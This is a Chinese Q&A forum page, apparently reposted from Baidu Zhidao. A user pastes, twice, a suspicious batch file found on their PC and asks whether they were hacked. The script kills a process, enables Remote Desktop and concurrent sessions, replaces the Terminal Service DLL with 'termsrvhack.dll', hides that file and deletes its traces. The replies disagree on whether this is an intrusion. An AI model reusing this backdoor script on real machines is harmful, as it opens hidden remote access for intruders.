UC知道大家看看我是不是被黑了
来源:百度知道 编辑:UC知道 时间:2024/05/16 23:28:56
在我的电脑c:\program files 里多了一个3389.dat的文件,这是文件内容
我是不是被黑了
@echo off
@ntsd -c q -p 860
@REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvhack.dll /f
@copy c:\termsrvhack.dll c:\windows\system32\termsrvhack.dll
@Attrib +H +S +R C:\windows\system32\termsrvhack.dll
@shutdown -a
@del c:\termsrvhack.dll
@del c:\3389.txt
@net stop sh
我是不是被黑了
@echo off
@ntsd -c q -p 860
@REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Winlogon /v KeepRASConnections /t REG_SZ /d 1 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Licensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\System32\termsrvhack.dll /f
@copy c:\termsrvhack.dll c:\windows\system32\termsrvhack.dll
@Attrib +H +S +R C:\windows\system32\termsrvhack.dll
@shutdown -a
@del c:\termsrvhack.dll
@del c:\3389.txt
@net stop sh
3389.dat是一个批处理文件
上面的意思是向系统注册了termsrvhack.dll 文件及其服务
termsrvhack.dll 是一个3389多用户文件
应该没被黑
是被开启了远程桌面服务。用360把没有用的服务关闭就可以了。再查杀一下看看有没有木马类的程序就可以了。
明确的告诉你,你肯定被入侵了。这是双开3389的批处理,3389就是远程桌面那个服务,然后黑客就能登陆你的机器了。
貌似应该是的吧。。
买个电脑公司板的系统盘` 冲新装下就OK了 估计不到10分钟。。
360+卡巴
好像是··········